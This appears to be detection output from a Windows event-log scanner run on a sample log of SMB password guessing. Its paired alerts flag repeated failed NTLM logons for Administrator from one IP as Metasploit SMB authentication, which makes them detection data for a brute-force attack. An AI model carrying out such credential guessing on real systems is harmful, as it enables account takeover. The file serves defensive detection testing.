+2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2BEOSGw6TjZf9GWS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UCxe24uL4A6R9kgZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F8v4DcIRkx43KCIs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CY2buVupQ5oR1Cp5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: f6c3MlpMEzkCVud2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E2wV6op9AU4paDXp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BNn6aywSs67hVAO2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wUa03SIX69WCIYbp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zYi4TB42B2VQm5Tr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9mnUbGMnlrOR8Tv4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CJGMWqgmbXABdPvB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2W9BbDYgC6vhqU3o  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q6DYsaih1Yhb2uOD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q4o93QpJL4pxx94q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lQf1OsHb4lpgMPbl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HcJUYelneVqBQjr9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I0d6daEeIadJRbBI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SQ1hvZeT9aulbu4g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 75RBCjr2eRDLhTqW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: maMlpuzhleuQHhIo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AkpNfbOHUr7cY52z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: R7SUyYbLPfPAGUfw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7clwftf7R0uNbqJ9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IsIyPcMAPnlxJa12  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4CKcyo1Ec4rs3Z2g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZlzKvZLO8CDotkbE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EyRpYYtmD8389Yvp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: t3Pg0H9Gncoyr45m  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zksaaJ7Z1wuy4PMx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3WdYAEdfWxLdM1rh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VyYFJRy0cxPfqDFh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Hv2Lz1h1bG6UatVR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FLKPLfEe3PpEzRNc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZJWv7ggzCSyEznOI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZUtR9CNfKMHQMd7T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6fYNHuRTqi15cRkL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DvxZHwJwrBYXlEyv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jscJTJjhKvCtDl8q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mZEIEjcimMyHWUsp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 30OdVRH9ZATLezsR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TJ1OSBVZHKmyOzj8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JanG6Q0oYpTdm9mC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PWCwDYL3T7TAdb0J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mRdyZaio1HjUKlNQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VjiRnExy9TzZTG0R  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
